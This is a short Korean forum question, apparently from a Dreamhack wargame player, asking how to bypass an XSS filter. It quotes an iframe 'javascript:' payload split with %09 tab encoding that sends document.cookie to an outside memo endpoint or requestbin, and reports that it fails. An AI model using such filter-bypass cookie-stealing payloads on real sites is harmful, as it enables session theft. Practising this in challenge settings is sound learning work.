iframe src=“javascript” 구문에 %09 URL 인코딩을 섞어서 필터링을 우회하고자 하는데요,

iframe src=“javascri%09pt:locatio%09n.href=%27~~~.dreamhack.games/?memo=%27+docu%09ment.gookie;”>
구문을 전송하면 vuln 페이지에서는 memo= 빈칸이 requestbin에 전송되고

flag 페이지에선 아무것도 전송되지 않습니다…

<iframe srcdoc 로는 javascript:~~ 구문이 안먹는것같고, 어떻게 우회해야될지 모르겟네요 ㅠㅠ